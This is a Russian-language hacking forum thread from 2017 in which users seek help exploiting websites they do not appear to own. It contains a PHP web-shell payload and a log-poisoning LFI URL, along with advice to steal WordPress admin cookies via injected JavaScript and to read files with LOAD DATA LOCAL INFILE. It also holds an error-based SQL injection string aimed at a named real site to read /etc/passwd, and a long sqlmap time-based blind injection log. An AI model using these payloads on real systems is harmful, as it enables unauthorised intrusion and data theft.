 |
|
19.09.2017, 23:11
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
|
|
|
20.09.2017, 21:39
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164
Репутация:
1
|
|
Привет всем читающим.
Нужна помощь. (Сразу извиняюсь, если задаю глупый вопрос)
Нашел lfi, пытаюсь раскрутить.
/proc/self/environ не работает
cmdline - /usr/sbin/httpd
В httpd.conf:
httpd.conf - ErrorLog logs/error_log
Перебирал различные пути, не нашел
Попробовал так:
GET /epicfaaaaaail.php?
Обращаюсь - /proc/self/fd/8%00&cmd=ls%00
Выдает что-то странное:
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
[error] [client x.x.x.x] File does not exist: /local/.../robots.txt
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
[error] [client x.x.x.x] File does not exist: /local/.../nonlinear
PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20
В каком направлении копать? |
|
|
|
20.09.2017, 22:45
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от billybonse
↑
GET /epicfaaaaaail.php?
Пейлод нужно в юзерагенте передавать. Так же, можно попробовать подцепить сессию и посмотреть что туда можно загнать.
https://rdot.org/forum/showthread.php?t=343 много полезной инфы на тему.
Нулл байт не нужен.
|
|
|
|
20.09.2017, 23:18
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
Провел на форуме:
12164
Репутация:
1
|
|
Сообщение от crlf
↑
Пейлод нужно в юзерагенте передавать
В соседней статье:
"Ты пишешь мини шелл: , кодируешь всё в url, составляешь и отправляешь пакет:
POST httр://localhost/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1
Host: localhost
А кто? Кто это сделал? Сервер, приняв и обработав запрос, выдает 404 ошибку (о несуществующей страницы epicfaaaaaail.php), и записал это в error_log, выглядеть на сервере это стало так:
Code:
127.0.0.1 - [29/Sep/2010:13:55:36 -0700] "GET /epicfaaaaaail.php? HTTP/1.1" 404 2326
т.е. получается, обратившись к этому логу, PHP интерпретатор обработает всё докак обычный текст, а значит всё, шелл есть. Ты обращаешься к error_log: httр://localhost/?page=../../../etc/httpd/log/error_log&cmd=phpinfo();die(); и ничуть не удивившись видишь результат выполнения phpinfo()."
Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.
|
|
|
|
20.09.2017, 23:34
|
|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212
Репутация:
441
|
|
Статью нужно перечитать ещё раз и подробно изучить тему по ссылке, которую я дал выше. У вас получилась мешанина из методов эксплуатации (procfs != логи).
Сообщение от billybonse
↑
Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.
Не обязательно.
|
|
|
|
26.09.2017, 19:53
|
|
Участник форума
Регистрация: 30.07.2011
Сообщений: 151
Провел на форуме:
54593
Репутация:
0
|
|
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
|
|
|
|
26.09.2017, 20:16
|
|
Познающий
Регистрация: 15.08.2015
Сообщений: 83
Провел на форуме:
17650
Репутация:
0
|
|
Сообщение от Muracha
↑
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
Посмотри в сторону load data local infile
|
|
|
|
27.09.2017, 23:43
|
|
Постоянный
Регистрация: 31.12.2011
Сообщений: 362
Провел на форуме:
137056
Репутация:
11
|
|
Сообщение от Muracha
↑
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?
Тебе уже ответили https://dev.mysql.com/doc/refman/5.7/en/load-data.html но тут нужно знать полный путь к файлу, поэтому нужна еще ошибка раскрытия путей, с галереей может не получится, нужно смотреть каким образом она отображает картинку, скорее всего там будет проверка на то является ли файл корректным изображением. Если ты можешь встраивать JS в страницу, то можно попробовать угнать куки администратора сайта, правда я не знаю как там в Wordpess с этим дела обстоят сейчас.
|
|
|
|
07.10.2017, 11:52
|
|
Постоянный
Регистрация: 18.07.2013
Сообщений: 300
Провел на форуме:
61136
Репутация:
32
|
|
Была уязвимость error based, так крутил: seo-fast.ru/news'or(extractvalue(null,concat(0x3a,substr(load_ file(0x2f6574632f706173737764),-30,30))))=
Сейчас вывод ошибок отключен, но думаю там сейчас time based blind, помогите проверить.
|
|
|
|
14.10.2017, 20:36
|
|
Новичок
Регистрация: 14.10.2017
Сообщений: 7
Провел на форуме:
2723
Репутация:
0
|
|
как таблицы открыть
[19:41:45] [INFO] fetching current database
[19:41:45] [INFO] fetching tables for database: 'имя базы'
[19:41:45] [INFO] fetching number of tables for database 'имя базы'
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>66
[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>52
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>48
[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
6b656e),1,1))>1
[19:41:47] [INFO] retrieved:
[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>66),SLEEP(10),9830)
[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>170454),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>819325),SLEEP(10),9830)
.
[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>261031),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>164592),SLEEP(10),9830)
.
[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>160487),SLEEP(10),9830)
.
[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>871054),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>913561),SLEEP(10),9830)
.
[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>478526),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>192387),SLEEP(10),9830)
.
[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>330357),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>385436),SLEEP(10),9830)
.
[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>145149),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>823404),SLEEP(10),9830)
.
[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>142557),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>848401),SLEEP(10),9830)
.
[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>487756),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>840171),SLEEP(10),9830)
.
[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>800333),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>899978),SLEEP(10),9830)
.
[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>502795),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>128986),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>227072),SLEEP(10),9830)
.
[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>648363),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>656500),SLEEP(10),9830)
.
[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>280401),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>721896),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>769715),SLEEP(10),9830)
.
[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>689458),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>747115),SLEEP(10),9830)
.
[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>103578),SLEEP(10),9830)
. (done)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>52),SLEEP(10),9830)
[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>48),SLEEP(10),9830)
[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
3656c746f6b656e),1,1))>1),SLEEP(10),9830)
[19:42:02] [INFO] retrieved:
[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds
[19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel
token'
[19:42:02] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] n
[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'
[*] shutting down at 19:42:09
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
